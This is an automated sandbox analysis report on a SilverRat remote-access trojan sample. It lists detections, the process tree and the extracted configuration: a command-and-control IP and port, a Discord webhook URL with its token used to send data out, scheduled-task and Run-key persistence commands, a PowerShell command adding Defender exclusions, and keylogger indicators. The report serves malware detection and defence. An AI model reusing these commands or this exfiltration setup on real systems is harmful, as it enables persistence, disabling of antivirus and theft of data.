Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YDW0S5K7hi.exe

Overview

General Information

Sample name:YDW0S5K7hi.exe
renamed because original name is a hash value
Original sample name:078f2f65179647c8a6af688be140138eae827e1f.exe
Analysis ID:1555421
MD5:fe4ee341b4e7e0d03e27893bd6070a3e
SHA1:078f2f65179647c8a6af688be140138eae827e1f
SHA256:fd32b776edd0656ad550b2a4981897515f5f2c793eb3d80da8fcd04f98b12222
Tags:exesilverratuser-NDA0E
Infos:

Detection

SilverRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected SilverRat
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • YDW0S5K7hi.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\YDW0S5K7hi.exe" MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
    • attrib.exe (PID: 7808 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7836 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7964 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • $77HelpPanel.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
        • schtasks.exe (PID: 8092 cmdline: "schtasks.exe" /query /TN $77HelpPanel.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8140 cmdline: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8188 cmdline: "schtasks.exe" /query /TN $77HelpPanel.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 4784 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7400 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • $77HelpPanel.exe (PID: 2608 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
  • cleanup

Malware Configuration

Threatname: SilverRat

{"Mutex": "SilverMutex_RxWYRpnqXs", "Host": "109.120.138.54", "Port": "9999", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
YDW0S5K7hi.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
        00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
          Process Memory Space: YDW0S5K7hi.exe PID: 7600JoeSecurity_SilverRatYara detected SilverRatJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.YDW0S5K7hi.exe.4b0000.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
              0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
                0.2.YDW0S5K7hi.exe.3e30b40.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7328, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\YDW0S5K7hi.exe, ProcessId: 7600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7328, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, ProcessId: 8140, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, ProcessId: 8140, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7328, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-13T21:11:36.230576+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749781TCP
                  2024-11-13T21:12:14.628423+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749981TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: YDW0S5K7hi.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeAvira: detection malicious, Label: HEUR/AGEN.1313069
                  Found malware configuration
                  Source: YDW0S5K7hi.exeMalware Configuration Extractor: SilverRat {"Mutex": "SilverMutex_RxWYRpnqXs", "Host": "109.120.138.54", "Port": "9999", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeReversingLabs: Detection: 60%
                  Multi AV Scanner detection for submitted file
                  Source: YDW0S5K7hi.exeReversingLabs: Detection: 60%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: YDW0S5K7hi.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: YDW0S5K7hi.exeString decryptor: -|S.S.S|-
                  Source: YDW0S5K7hi.exeString decryptor: 109.120.138.54
                  Source: YDW0S5K7hi.exeString decryptor: 9999
                  Source: YDW0S5K7hi.exeString decryptor: https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT
                  Source: YDW0S5K7hi.exeString decryptor: https://g.top4top.io/p_2522c7w8u1.png
                  Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: YDW0S5K7hi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: global trafficTCP traffic: 192.168.2.7:49766 -> 109.120.138.54:9999
                  Source: global trafficHTTP traffic detected: POST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 414Expect: 100-continueConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
                  Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49981
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49781
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 109.120.138.54
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: discord.com
                  Source: unknownHTTP traffic detected: POST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 414Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 20:11:31 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731528693x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW73MYqKH3Z90xhdPmQ0gadTnrC5LwF78B4rIcEsGOBbKbFt5FAb7TF5TB%2BsfAtRkkv1IVWKnXI3t893J9JuotwNXlvOJgP4slxxcpgwFU6R9JN9Q78YJOhN3NrE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4dda201f464c81e917efe784742ecb12015cec99-1731528691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=27Y0rH0vNJF3OpOz3GsOUjHcHWN1QbZUj3jzzy7z4Gc-1731528691632-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2169518d364630-DFW{"message": "Unknown Webhook", "code": 10015}
                  Source: $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                  Source: YDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, $77HelpPanel.exe, 0000000A.00000002.2615038791.00000000039A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                  Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4
                  Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u
                  Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u1.png
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49760 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: YDW0S5K7hi.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
                  Contains functionality to log keystrokes (.Net Source)
                  Source: YDW0S5K7hi.exe, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: $77HelpPanel.exe.0.dr, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeCode function: 0_2_00007FFAAB402F09 NtSetValueKey,0_2_00007FFAAB402F09
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeCode function: 10_2_00007FFAAB417DF210_2_00007FFAAB417DF2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeCode function: 10_2_00007FFAAB41704610_2_00007FFAAB417046
                  Source: $77HelpPanel.exe.0.drStatic PE information: No import functions for PE file found
                  Source: YDW0S5K7hi.exeStatic PE information: No import functions for PE file found
                  Source: YDW0S5K7hi.exe, 00000000.00000000.1355727860.00000000004BE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
                  Source: YDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
                  Source: YDW0S5K7hi.exeBinary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
                  Source: YDW0S5K7hi.exe, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: $77HelpPanel.exe.0.dr, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: YDW0S5K7hi.exe, Settings.csTask registration methods: 'CreateShTasks'
                  Source: $77HelpPanel.exe.0.dr, Settings.csTask registration methods: 'CreateShTasks'
                  Source: YDW0S5K7hi.exe, Settings.csBase64 encoded string: 'PL1Jz+Hm4HZVHr6zjlmEZd6kvHcE1BBNsMj0NoxMcYhH9mDrU7txN7Qkl4OqUhu3kCzytC70kLHj1GRZcBJzg/rENtwJc/B1IleS7EfNGt19pl7YEUB57ebpuT3MyXxRztard04//4F6t6V+21uMalnoU4F/kLYihtJ6cScFXn3Scv45U3MTsVXFUDvx1gR/ZaCjARMaoomFguK2VuvUBBpDQ+viPBDIY843Mp3Bpk3iqMYuiPtPv5MtbRBfjMVWyV0yPlpitIEryY6n41k7ak+T4Lid/B4f9CIP6bFitj0noBryYRBYdvLAFkYh0blzivySX9g/ki6qetTHGWuMLOFZV2be96X5vYs195YmZZZTxeUG8OKCB3z+lxFxzX1cVmhs3bpce2x6iZ5ZgEQNHQLq+wGPjTXMHkpibOFJzjxOb+OCPrSF2XJSVrZKA/QXso1iooOJhkuN7rsgeOV581Z8jLwjvgiTexeC9MPq49yyrof43HfibBGnP9AK8CT+26DhzpQu7PfSkCD0b80XgGKut/xpNyGOv8ePX3t1JM3ICHnBCawOEoxij4vD1mOXhOzu/DrpXJxf4549o3j1x2GcRC9AhiSCcnF3AbSQjJ9tnGOlCJJsi2FVdzkwtTgTALjpM/3R+5UCkRfzlY99nFvXqcJyApHm2ZufEuiBW0c=', 